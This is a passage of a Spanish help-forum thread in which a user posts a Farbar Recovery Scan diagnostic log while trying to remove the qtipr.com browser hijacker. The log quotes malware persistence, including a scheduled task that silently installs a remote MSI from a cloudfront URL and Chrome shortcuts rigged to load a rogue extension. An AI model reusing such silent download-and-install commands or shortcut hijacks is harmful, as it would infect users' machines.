      Task: {24CF3464-BBD4-4701-9651-D44FCFD59823} - System32\Tasks\Hewlett-Packard\HP Support Assistant\WarrantyChecker_CN55Q341TN => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPWarrantyCheck\HPWarrantyChecker.exe [2017-01-09] (HP Inc.)
      Task: {316C4298-F598-4ED6-A188-CA245D09248A} - System32\Tasks\Lenovo\Lenovo Customer Feedback Program 64 => C:\Program Files (x86)\Lenovo\Customer Feedback Program\Lenovo.TVT.CustomerFeedback.Agent.exe [2014-08-18] (Lenovo)
      Task: {344C8415-CA09-407F-8FF8-84D4CD2C13A3} - System32\Tasks\Hewlett-Packard\HP Support Assistant\HP Support Assistant Quick Start => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\HPSF.exe [2016-12-07] (HP Inc.)
      Task: {43437870-9096-4F74-80ED-019E32A7F3BB} - System32\Tasks\Hewlett-Packard\HP Support Assistant\PC Health Analysis => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\HPSF.exe [2016-12-07] (HP Inc.)
      Task: {47442698-0AAA-4E9A-A3AC-3A9E147223AC} - System32\Tasks\{684F9C00-69E1-4E4F-A3A8-D8458EF013E4} => pcalua.exe -a "C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\core\PDApp.exe" -c --appletID="DWA_UI" --appletVersion="2.0" --mode="Uninstall" --mediaSignature="{7176B973-6011-43C1-AEBC-2D73FE7C6982}"
      Task: {4817D863-8B62-47C7-877F-68E7227E9AC6} - System32\Tasks\Microsoft\Windows\RemovalTools\MRT_HB => C:\WINDOWS\system32\MRT.exe [2017-01-11] (Microsoft Corporation)
      Task: {564C1713-0A11-4F56-81BD-C68602FDCB00} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2017-02-14] (Google Inc.)
      Task: {69FAD12E-853A-492A-AEB2-B9770FA046D5} - System32\Tasks\GenericSettingsHandler\Windows-Credentials\RetrySyncTask_for_S-1-5-21-1830392043-3884525579-1098650476-1002
      Task: {6D0789F1-3F20-4BE9-8967-1F7E248D59F1} - System32\Tasks\Adobe Flash Player PPAPI Notifier => C:\WINDOWS\SysWOW64\Macromed\Flash\FlashUtil32_24_0_0_194_pepper.exe [2017-01-11] (Adobe Systems Incorporated)
      Task: {6D514D6E-A32C-4959-BE41-0A25EBED43EC} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2017-02-14] (Google Inc.)
      Task: {6E05C25A-BCD4-4F68-B544-63A3E24ACB14} - System32\Tasks\GridinSoft Anti-Malware => C:\Program Files\GridinSoft Anti-Malware\gsam.exe
      Task: {6E500308-B0C6-442D-851B-25AF2B0591E7} - System32\Tasks\HPCustParticipation HP ENVY 4500 series => C:\Program Files\HP\HP ENVY 4500 series\Bin\HPCustPartic.exe [2014-07-21] (Hewlett-Packard Development Company, LP)
      Task: {7CCF7588-053C-4E5B-A106-FFB407225B4B} - System32\Tasks\PDVDServ Task => C:\Program Files (x86)\Lenovo\PowerDVD10\PDVD10Serv.EXE [2013-03-08] (CyberLink Corp.)
      Task: {7D5E4006-92CA-4FCD-8AEA-6F0528191076} - System32\Tasks\{A3A11742-19D9-4049-A5BB-5120CE25D095} => pcalua.exe -a "C:\Users\Alberto\Programas\CUBASE SC5\PLUGINS VST\MASTERING\YAMAHA FINAL MASTER\Final.Master.VST.Plugin.v1.0 WORKING\Setup.exe" -d "C:\Users\Alberto\Programas\CUBASE SC5\PLUGINS VST\MASTERING\YAMAHA FINAL MASTER\Final.Master.VST.Plugin.v1.0 WORKING"
      Task: {88F60BAF-1924-475E-A734-6784040F51E0} - System32\Tasks\[email protected] => C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\UWA\UpdaterStartupUtility.exe [2016-07-01] (Adobe Systems Incorporated)
      Task: {8FEB47DB-6AF4-43E4-82EC-A450E7786342} - System32\Tasks\Erwushprazase Configuration => C:\Program Files (x86)\Eceent\clacay.exe
      Task: {A2E41054-2375-4D39-A6E0-3D25F04BAD6B} - System32\Tasks\{78EF23FA-0C21-4663-BD98-DFF09324C3AF} => pcalua.exe -a "C:\Program Files (x86)\Atari\RollerCoaster Tycoon 3 Platinum\RCT3plus.exe" -d "C:\Program Files (x86)\Atari\RollerCoaster Tycoon 3 Platinum"
      Task: {A8BE2E1C-85B0-4662-8D41-42B9A2F5D2B6} - System32\Tasks\Hewlett-Packard\HP Support Assistant\HP Support Solutions Framework Updater => C:\Program Files (x86)\Hewlett-Packard\HP Support Solutions\Modules\HPSSFUpdater.exe [2016-12-07] (HP Inc.)
      Task: {C247449E-399B-454A-A5D9-7894986158E8} - System32\Tasks\Microsoft\Office\Office 15 Subscription Heartbeat => C:\Program Files\Common Files\Microsoft Shared\Office15\OLicenseHeartbeat.exe [2014-01-23] (Microsoft Corporation)
      Task: {C7477296-FEB9-4980-8829-2A177E1192EE} - System32\Tasks\Adobe Flash Player Updater => C:\WINDOWS\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [2017-01-11] (Adobe Systems Incorporated)
      Task: {CA9DC688-14FC-4374-8E45-0267757F1E04} - System32\Tasks\Lenovo\Dependency Package Auto Update => C:\Program Files\Lenovo\iMController\AutoUpdate.exe [2015-12-14] ()
      Task: {D320554E-B18B-4FFF-B72A-B362A736A32D} - System32\Tasks\Microsoft\Office\OfficeTelemetryAgentLogOn => C:\Program Files\Microsoft Office\Office15\msoia.exe [2014-01-23] (Microsoft Corporation)
      Task: {D6B27619-ED57-41A6-B563-28F9588E867B} - System32\Tasks\{BEFD2162-C6CF-488F-8778-A79BA873E300} => pcalua.exe -a "C:\Program Files (x86)\ItVffRpktW\uninstall.exe"
      Task: {E10613C2-CD91-4CE6-B256-74479A195DB3} - System32\Tasks\Microsoft\Office\OfficeTelemetryAgentFallBack => C:\Program Files\Microsoft Office\Office15\msoia.exe [2014-01-23] (Microsoft Corporation)
      Task: {EF46272C-91A2-4AE7-B9FD-68453CF46DD7} - System32\Tasks\Chevuge => "msiexec" /i hxxp://d2buh1bf1g584w.cloudfront.net/msi/rel.php?u=ST1000LM024XHN-M101MBB_S30YJ9AF353546&amp;v=201729 /q

      (If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)

      Task: C:\WINDOWS\Tasks\Adobe Flash Player PPAPI Notifier.job => C:\WINDOWS\SysWOW64\Macromed\Flash\FlashUtil32_24_0_0_194_pepper.exe
      Task: C:\WINDOWS\Tasks\Adobe Flash Player Updater.job => C:\WINDOWS\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe
      Task: C:\WINDOWS\Tasks\HPCeeScheduleForAlberto.job => C:\Program Files (x86)\Hewlett-Packard\HP Ceement\HPCEE.exe

      ==================== Shortcuts =============================

      (The entries could be listed to be restored or removed.)

      WMI_ActiveScriptEventConsumer_ASEC: <===== ATTENTION

      Shortcut: C:\Users\Alberto\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Intеrnеt Ехрlоrеr.lnk -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation) <===== Cyrillic

      ShortcutWithArgument: C:\Users\Alberto\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Google Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> --load-extension="C:\Users\Alberto\AppData\Local\kemgadeojglibflomicgnfeopkdfflnk" hxxp://qtipr.com/
      ShortcutWithArgument: C:\Users\Alberto\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Google Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> --load-extension="C:\Users\Alberto\AppData\Local\kemgadeojglibflomicgnfeopkdfflnk" hxxp://qtipr.com/
      ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> --load-extension="C:\Users\Alberto\AppData\Local\kemgadeojglibflomicgnfeopkdfflnk" hxxp://qtipr.com/
      ShortcutWithArgument: C:\Users\Public\Desktop\Google Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> --load-extension="C:\Users\Alberto\AppData\Local\kemgadeojglibflomicgnfeopkdfflnk" hxxp://qtipr.com/

      ==================== Loaded Modules (Whitelisted) ==============

      2014-09-17 01:56 - 2014-07-02 18:55 - 00116568 _____ () C:\Program Files\NVIDIA Corporation\Display\NvSmartMax64.dll
      2012-12-24 05:53 - 2012-12-24 05:53 - 00129024 _____ () C:\WINDOWS\System32\HPCP1020LM.DLL
      2017-02-10 15:18 - 2014-01-06 14:56 - 00079872 _____ () C:\Program Files (x86)\REALTEK\Realtek Bluetooth\BTDevMgr.exe
      2017-02-15 23:44 - 2017-01-20 07:47 - 02264352 _____ () C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\PoliciesControllerImpl.dll
      2017-02-15 23:44 - 2017-01-20 07:47 - 02254800 _____ () C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\MwacLib.dll
      2017-02-15 23:44 - 2017-01-20 07:47 - 02829776 _____ () C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\arwlib.dll
      2016-10-25 09:57 - 2016-10-25 09:57 - 00491184 _____ () C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CoreSyncExtension\CoreSync_x64.dll
      2014-05-09 14:39 - 2010-10-26 04:40 - 00049056 _____ () C:\Program Files\CONEXANT\ForteConfig\fmapp.exe
      2017-02-08 02:53 - 2017-02-08 02:53 - 00073728 _____ () C:\Program Files\CCleaner\lang\lang-1034.dll
      2016-10-25 09:57 - 2016-10-25 09:57 - 31723696 _____ () C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CoreSync\CoreSync.exe
      2017-02-14 23:10 - 2017-02-01 09:47 - 02459992 _____ () C:\Program Files (x86)\Google\Chrome\Application\56.0.2924.87\libglesv2.dll
      2017-02-14 23:10 - 2017-02-01 09:47 - 00099672 _____ () C:\Program Files (x86)\Google\Chrome\Application\56.0.2924.87\libegl.dll
      2016-12-02 01:54 - 2016-12-02 01:54 - 00118272 _____ () \\?\C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CCXProcess\js\node_modules\fs-ext\build\Release\fs-ext.node
      2016-12-02 01:54 - 2016-12-02 01:54 - 00223232 _____ () \\?\C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CCXProcess\js\node_modules\node-vulcanjs\build\Release\VulcanJS.node
      2016-12-02 01:54 - 2016-12-02 01:54 - 00117248 _____ () \\?\C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CCXProcess\js\node_modules\ref\build\Release\binding.node
      2016-12-02 01:54 - 2016-12-02 01:54 - 00124928 _____ () \\?\C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CCXProcess\js\node_modules\ffi\build\Release\ffi_bindings.node
      2016-12-09 15:09 - 2016-12-09 15:09 - 00099416 _____ () C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CCXProcess\js\node_modules\node-ProxyResolver\build\Release\ProxyResolverWin.dll
      2016-12-02 01:54 - 2016-12-02 01:54 - 00086528 _____ () \\?\C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CCXProcess\js\node_modules\idle-gc\build\Release\idle-gc.node
      2016-10-10 23:15 - 2016-10-10 23:15 - 00118272 _____ () \\?\C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CCLibrary\js\node_modules\fs-ext\build\Release\fs-ext.node
      2016-10-10 23:15 - 2016-10-10 23:15 - 00117760 _____ () \\?\C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CCLibrary\js\node_modules\ref\build\Release\binding.node
      2016-10-10 23:15 - 2016-10-10 23:15 - 00125440 _____ () \\?\C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CCLibrary\js\node_modules\ffi\build\Release\ffi_bindings.node
      2016-10-10 23:17 - 2016-10-10 23:17 - 00223232 _____ () \\?\C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CCLibrary\js\node_modules\node-vulcanjs\build\Release\VulcanJS.node
      2016-12-09 15:02 - 2016-12-09 15:02 - 00099416 _____ () C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CCLibrary\js\node_modules\node-ProxyResolver\build\Release\ProxyResolverWin.dll
      2016-10-10 23:14 - 2016-10-10 23:14 - 00121856 _____ () \\?\C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CCLibrary\js\node_modules\bufferutil\build\Release\bufferutil.node
      2016-10-10 23:14 - 2016-10-10 23:14 - 00166400 _____ () \\?\C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CCLibrary\js\node_modules\idle-gc\build\Release\idle-gc.node
      2014-05-09 14:30 - 2013-09-16 19:20 - 01242584 _____ () C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\LMS\ACE.dll

      ======================

    5. #5
      Usuario Avatar de Darkor
      Registrado
      oct 2006
      Ubicación
      España
      Mensajes
      9

      Re: Eliminar qtipr.com

      Parte restante del archivo Addition del Farbar Recovery que no pude pegarla toda junto con el anterior

      ==================== Alternate Data Streams (Whitelisted) =========

      (If an entry is included in the fixlist, only the ADS will be removed.)

      AlternateDataStreams: C:\Windows:nlsPreferences [386]
      AlternateDataStreams: C:\WINDOWS\system32\drivers:ucdrv-x64.sys [80850]
      AlternateDataStreams: C:\WINDOWS\system32\drivers:x64 [364744]
      AlternateDataStreams: C:\WINDOWS\system32\drivers:x86 [1176354]
      AlternateDataStreams: C:\Users\Alberto\Configuración local:k7RtSr3u5tYnlX2Bwkwx [2428]
      AlternateDataStreams: C:\Users\Alberto\Configuración local:Lmb9BqubakMCfIXhy [2322]
      AlternateDataStreams: C:\Users\Alberto\AppData\Local:k7RtSr3u5tYnlX2Bwkwx [2428]
      AlternateDataStreams: C:\Users\Alberto\AppData\Local:Lmb9BqubakMCfIXhy [2322]
      AlternateDataStreams: C:\Users\Alberto\AppData\Local\Archivos temporales de Internet:G7RosvZLTjKjBQvoMJUig [2252]
      AlternateDataStreams: C:\Users\Alberto\AppData\Local\Datos de programa:k7RtSr3u5tYnlX2Bwkwx [2428]
      AlternateDataStreams: C:\Users\Alberto\AppData\Local\Datos de programa:Lmb9BqubakMCfIXhy [2322]
      AlternateDataStreams: C:\ProgramData\Reprise:wupeogjxldtlfudivq`qsp`27hfm [0]

      ==================== Safe Mode (Whitelisted) ===================

      (If an entry is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)

      HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\MBAMService => ""="Service"
      HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\mcpltsvc => ""=""
      HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\MBAMService => ""="Service"
      HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mcpltsvc => ""=""

      ==================== Association (Whitelisted) ===============

      (If an entry is included in the fixlist, the registry item will be restored to default or removed.)


      ==================== Internet Explorer trusted/restricted ===============

      (If an entry is included in the fixlist, it will be removed from the registry.)


      ==================== Hosts content: ==========================

      (If needed Hosts: directive could be included in the fixlist to reset Hosts.)

      2013-08-22 13:25 - 2017-02-15 23:44 - 00000124 ___RA C:\WINDOWS\system32\Drivers\etc\hosts

      127.0.0.1 localhost
      127.0.0.1 telemetry.malwarebytes.com
      127.0.0.1 skipittok.com
      0.0.0.0 keystone.mwbsys.com

      ==================== Other Areas ============================

      (Currently there is no automatic fix for this section.)

      HKU\S-1-5-21-1830392043-3884525579-1098650476-1002\Control Panel\Desktop\\Wallpaper -> C:\Users\Alberto\Pictures\rcLoRekAi.jpg
      DNS Servers: 212.40.224.73 - 62.42.230.24
      HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: )
      Windows Firewall is enabled.

      ==================== MSCONFIG/TASK MANAGER disabled items ==

      HKLM\...\StartupApproved\Run: => "OnekeyStudio"
      HKLM\...\StartupApproved\Run: => "BtServer"
      HKLM\...\StartupApproved\Run32: => "AdobeCS6ServiceManager"
      HKLM\...\StartupApproved\Run32: => "SwitchBoard"
      HKU\S-1-5-21-1830392043-3884525579-1098650476-1002\...\StartupApproved\StartupFolder: => "Enviar a OneNote.lnk"
      HKU\S-1-5-21-1830392043-3884525579-1098650476-1002\...\StartupApproved\StartupFolder: => "Adobe Gamma.lnk"

      ==================== FirewallRules (Whitelisted) ===============

      (If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

      FirewallRules: [vm-monitoring-nb-session] => (Allow) LPort=139
      FirewallRules: [{64A4AA39-85E2-4310-A700-6DF0286EFA48}] => (Allow) C:\Program Files\Common Files\mcafee\platform\McSvcHost\McSvHost.exe
      FirewallRules: [{5677BB30-EA31-4265-B842-B0BF4D04936B}] => (Allow) C:\Program Files\Common Files\mcafee\platform\McSvcHost\McSvHost.exe
      FirewallRules: [{85B30AF4-F506-440D-97AF-79CE07E539FD}] => (Allow) C:\Program Files (x86)\Lenovo\PowerDVD10\PowerDVD Cinema\PowerDVDCinema10.exe
      FirewallRules: [{B2B85FDB-E8E9-44C9-B503-0E4DD98A5591}] => (Allow) C:\Program Files (x86)\Lenovo\PowerDVD10\PowerDVD10.EXE
      FirewallRules: [TCP Query User{904C3AB0-00BA-44C8-B3B2-2584455525A8}C:\world of warcraft\wow-x.x.x.x-4.0.0.12911-eu-downloader.exe] => (Allow) C:\world of warcraft\wow-x.x.x.x-4.0.0.12911-eu-downloader.exe
      FirewallRules: [UDP Query User{797AFBE0-6FE5-4B4D-B466-8FFE917F1C15}C:\world of warcraft\wow-x.x.x.x-4.0.0.12911-eu-downloader.exe] => (Allow) C:\world of warcraft\wow-x.x.x.x-4.0.0.12911-eu-downloader.exe
      FirewallRules: [{43E29B88-652F-4CA1-8602-413AE952DE07}] => (Allow) C:\Program Files (x86)\NVIDIA Corporation\NetService\NvNetworkService.exe
      FirewallRules: [{78D82B1B-871A-42D1-B56A-33D765EC5961}] => (Allow) C:\Program Files (x86)\NVIDIA Corporation\NetService\NvNetworkService.exe
      FirewallRules: [{034296EE-CD83-43F7-A268-C1FB2295A489}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamsvc.exe
      FirewallRules: [{D6FB44FA-C261-4B86-8A9C-532726E9E10B}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamsvc.exe
      FirewallRules: [{3F83E220-447C-4E0A-8533-D0BA48370B11}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamer.exe
      FirewallRules: [{BF1B9B23-4C45-4565-8CA9-793D406855B0}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamer.exe
      FirewallRules: [{85B767D6-5D31-4CF2-804F-E5BF553C785E}] => (Allow) C:\World of Warcraft\Launcher.exe
      FirewallRules: [{4E98F772-D3A3-4978-8B8D-D9FC5B6EB516}] => (Allow) C:\World of Warcraft\Launcher.exe
      FirewallRules: [{52372B4E-13E7-4079-8AD1-E55243FB8D08}] => (Allow) C:\World of Warcraft\Launcher.patch.exe
      FirewallRules: [{4079FA84-365B-4B42-9718-F4EF043524A6}] => (Allow) C:\World of Warcraft\Launcher.patch.exe
      FirewallRules: [TCP Query User{78284271-4D36-4B2F-B21B-4A9A4670D6DB}C:\world of warcraft\temp\wow-4.3-5.0.15890-enus-downloader.exe] => (Allow) C:\world of warcraft\temp\wow-4.3-5.0.15890-enus-downloader.exe
      FirewallRules: [UDP Query User{2E52AA23-E327-4E4B-B38A-2441DF52BD01}C:\world of warcraft\temp\wow-4.3-5.0.15890-enus-downloader.exe] => (Allow) C:\world of warcraft\temp\wow-4.3-5.0.15890-enus-downloader.exe
      FirewallRules: [{FC928487-2F84-4FC0-90CC-8A970599EFA7}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.3346\Agent.exe
      FirewallRules: [{97FA964A-83D2-43DE-A0BA-AF65E0DF6355}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.3346\Agent.exe
      FirewallRules: [{2860A868-0827-4974-B2FC-58C76F95B34D}] => (Allow) C:\Program Files (x86)\Battle.net\Battle.net.exe
      FirewallRules: [{F5AB4D5F-5153-4BCE-8DB6-DAD438D0F10C}] => (Allow) C:\Program Files (x86)\Battle.net\Battle.net.exe
      FirewallRules: [{337A7EC8-EAD5-4279-A556-DB73366948F4}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.3372\Agent.exe
      FirewallRules: [{D10E51D4-A555-4AAD-9F4D-DCB43175F38E}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.3372\Agent.exe
      FirewallRules: [{6433BF4C-1195-46E2-BB98-86D2005FB7E8}] => (Allow) C:\Program Files (x86)\TeamViewer\Version9\TeamViewer.exe
      FirewallRules: [{10EC92C5-F9B9-45EA-9BB7-0E2F864A1348}] => (Allow) C:\Program Files (x86)\TeamViewer\Version9\TeamViewer.exe
      FirewallRules: [{8F21AF92-5FB5-4689-8A9B-61C945693EB8}] => (Allow) C:\Program Files (x86)\TeamViewer\Version9\TeamViewer_Service.exe
      FirewallRules: [{650570A2-2D4C-4506-994F-418EC3D0583C}] => (Allow) C:\Program Files (x86)\TeamViewer\Version9\TeamViewer_Service.exe
      FirewallRules: [{85D9A4C4-CAEE-4A77-8B65-B12E31779FB7}] => (Allow) C:\Program Files\Microsoft Office 15\root\Office15\Lync.exe
      FirewallRules: [{41930DD1-0134-4150-8D71-C2C2DF60657E}] => (Allow) C:\Program Files\Microsoft Office 15\root\Office15\UcMapi.exe
      FirewallRules: [{65FBCCB4-26E2-45AD-810B-020758E80C1A}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.3507\Agent.exe
      FirewallRules: [{11904EF8-519D-4299-AAA4-FA0F942D231F}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.3507\Agent.exe
      FirewallRules: [{FFA77008-8426-4161-AA37-DDF96EF3F39A}] => (Allow) C:\Program Files (x86)\Common Files\Apple\Apple Application Support\WebKit2WebProcess.exe
      FirewallRules: [{E0B68185-3699-48F0-AAA5-F4D03D3818CF}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.3526\Agent.exe
      FirewallRules: [{389B8FA3-528E-4023-8854-290F7F0FE798}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.3526\Agent.exe
      FirewallRules: [{DC8A11B8-64A0-4619-85E6-22014B397872}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.3632\Agent.exe
      FirewallRules: [{0C75ABAA-5FAF-44FA-B03A-F1D400F046E0}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.3632\Agent.exe
      FirewallRules: [{EB46A59D-FC80-4D2A-8FBF-D69A3A9E8B84}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.3634\Agent.exe
      FirewallRules: [{0E747BAC-E286-4EF0-B544-AE4DE501BD4A}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.3634\Agent.exe
      FirewallRules: [TCP Query User{4897905E-A253-4634-B6D9-83EE825129ED}C:\users\alberto\appdata\roaming\bittorrent\bittorrent.exe] => (Block) C:\users\alberto\appdata\roaming\bittorrent\bittorrent.exe
      FirewallRules: [UDP Query User{ECE83033-BD6B-467B-A05F-ED3D969E0A9C}C:\users\alberto\appdata\roaming\bittorrent\bittorrent.exe] => (Block) C:\users\alberto\appdata\roaming\bittorrent\bittorrent.exe
      FirewallRules: [{907CA573-9707-4AC8-BB65-0632C5BFDA62}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.3669\Agent.exe
      FirewallRules: [{FE313894-CFAE-4802-8C1C-74F52956B415}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.3669\Agent.exe
      FirewallRules: [{6F4E3B31-F662-42CD-9AF7-758C26A6EAD0}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.3688\Agent.exe
      FirewallRules: [{1FEC1A43-E809-40BB-B729-3498362A1226}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.3688\Agent.exe
      FirewallRules: [{AD37EAE3-EC20-46A5-BA62-BB0048BD5913}] => (Allow) C:\Program Files (x86)\Skype\Phone\Skype.exe
      FirewallRules: [{13114819-8C38-46CB-9800-647E28675B29}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.3689\Agent.exe
      FirewallRules: [{16979F78-B814-4214-828A-B94B1747E785}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.3689\Agent.exe
      FirewallRules: [{8F0CDB27-8A11-4F97-96AA-402BC5C09357}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.3715\Agent.exe
      FirewallRules: [{DEC63037-C032-4982-898F-B0095592CAC8}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.3715\Agent.exe
      FirewallRules: [{29244ADF-FD36-4B31-89CE-2AD05B32D07E}] => (Allow) C:\Users\Alberto\AppData\Roaming\uTorrent\uTorrent.exe
      FirewallRules: [{825CAB47-7635-4BED-8232-F33D4D7A8E51}] => (Allow) C:\Users\Alberto\AppData\Roaming\uTorrent\uTorrent.exe
      FirewallRules: [TCP Query User{DC2B9F4C-F033-41E4-B16F-4426C7EA8888}C:\program files (x86)\mozilla firefox\firefox.exe] => (Allow) C:\program files (x86)\mozilla firefox\firefox.exe
      FirewallRules: [UDP Query User{A08FB56D-4D1C-469D-99EC-EAB06B89E87D}C:\program files (x86)\mozilla firefox\firefox.exe] => (Allow) C:\program files (x86)\mozilla firefox\firefox.exe
      FirewallRules: [{BE747823-D523-4A1B-AF7C-58CFFCED5845}] => (Allow) C:\Program Files\Microsoft Office\Office15\lync.exe
      FirewallRules: [{240D4285-C809-4307-A00F-F1BF15118900}] => (Allow) C:\Program Files\Microsoft Office\Office15\lync.exe
      FirewallRules: [{19A3085D-8D38-4FFA-A55C-83D5064E3903}] => (Allow) C:\Program Files\Microsoft Office\Office15\UcMapi.exe
      FirewallRules: [{FD3D2103-6DE9-4AAA-A0C6-321BF241FCB6}] => (Allow) C:\Program Files\Microsoft Office\Office15\UcMapi.exe
      FirewallRules: [{464CCC7D-1645-4727-BEBB-4819DBC6911A}] => (Allow) C:\Program Files\HP\HP ENVY 4500 series\Bin\DeviceSetup.exe
      FirewallRules: [{CB2609F7-9D79-454E-ADDF-502C61DF54B0}] => (Allow) LPort=5357
      FirewallRules: [{50576B7E-104C-45AC-8A61-6D1DC4BA5910}] => (Allow) C:\Program Files\HP\HP ENVY 4500 series\Bin\HPNetworkCommunicatorCom.exe
      FirewallRules: [{B76BC022-7433-428A-B1CA-B48B630DF5FA}] => (Allow) C:\Program Files\Microsoft Office\Office15\lync.exe
      FirewallRules: [{4E86C36A-952A-4809-AF36-992EE0FD5A77}] => (Allow) C:\Program Files\Microsoft Office\Office15\lync.exe
      FirewallRules: [{4055F52F-1F36-437A-8C56-BC3D4A9D93BC}] => (Allow) C:\Program Files\Microsoft Office\Office15\UcMapi.exe
      FirewallRules: [{96F4DC4C-5F9F-4E31-AAA3-83254DD04208}] => (Allow) C:\Program Files\Microsoft Office\Office15\UcMapi.exe
      FirewallRules: [{30BC4282-0BD5-4B45-B2FD-E0E8710D705D}] => (Allow) C:\Users\Alberto\AppData\Local\Temp\7zS040A\HPDiagnosticCoreUI.exe
      FirewallRules: [{40D3FF0B-E002-406F-A4C7-8F6239B9FEC2}] => (Allow) C:\Users\Alberto\AppData\Local\Temp\7zS040A\HPDiagnosticCoreUI.exe
      FirewallRules: [{F101F3A7-6D80-4131-8BEB-17A9DC48CB33}] => (Allow) C:\Users\Alberto\AppData\Roaming\uTorrent\uTorrent.exe
      FirewallRules: [{54E686C6-241C-425A-9D9A-E0AF5FADDC0E}] => (Allow) C:\Users\Alberto\AppData\Roaming\uTorrent\uTorrent.exe
      FirewallRules: [{57046DF0-E908-423A-87A2-75D5DA60C996}] => (Allow) C:\Users\Alberto\AppData\Roaming\uTorrent\uTorrent.exe
      FirewallRules: [{72A76DB4-4DCA-4D5B-96C9-369B62BED6E4}] => (Allow) C:\Users\Alberto\AppData\Roaming\uTorrent\uTorrent.exe
      FirewallRules: [{5F0D36BF-2181-4E88-BABB-8231C9B4CE6D}] => (Allow) C:\Users\Alberto\AppData\Roaming\uTorrent\uTorrent.exe
      FirewallRules: [{35ABF9C3-8320-4C0C-B54C-891319654FFD}] => (Allow) C:\Users\Alberto\AppData\Roaming\uTorrent\uTorrent.exe
      FirewallRules: [TCP Query User{C1D51E93-92D0-46B2-A2B1-810F6B4D5117}C:\users\alberto\appdata\local\ucbrowser\user data_i18n\thunder\1.0.0.0\download\minithunderplatform.exe] => (Block) C:\users\alberto\appdata\local\ucbrowser\user data_i18n\thunder\1.0.0.0\download\minithunderplatform.exe
      FirewallRules: [UDP Query User{A2332F5B-0D09-49B1-AFAD-E70CB414EE79}C:\users\alberto\appdata\local\ucbrowser\user data_i18n\thunder\1.0.0.0\download\minithunderplatform.exe] => (Block) C:\users\alberto\appdata\local\ucbrowser\user data_i18n\thunder\1.0.0.0\download\minithunderplatform.exe
      FirewallRules: [TCP Query User{25C3E988-35BA-46E7-AF5E-451A438CDE66}C:\users\alberto\appdata\roaming\utorrent\updates\3.4.8_42449.exe] => (Block) C:\users\alberto\appdata\roaming\utorrent\updates\3.4.8_42449.exe
      FirewallRules: [UDP Query User{0B555522-B9F2-4662-ACC4-C469B49BA867}C:\users\alberto\appdata\roaming\utorrent\updates\3.4.8_42449.exe] => (Block) C:\users\alberto\appdata\roaming\utorrent\updates\3.4.8_42449.exe
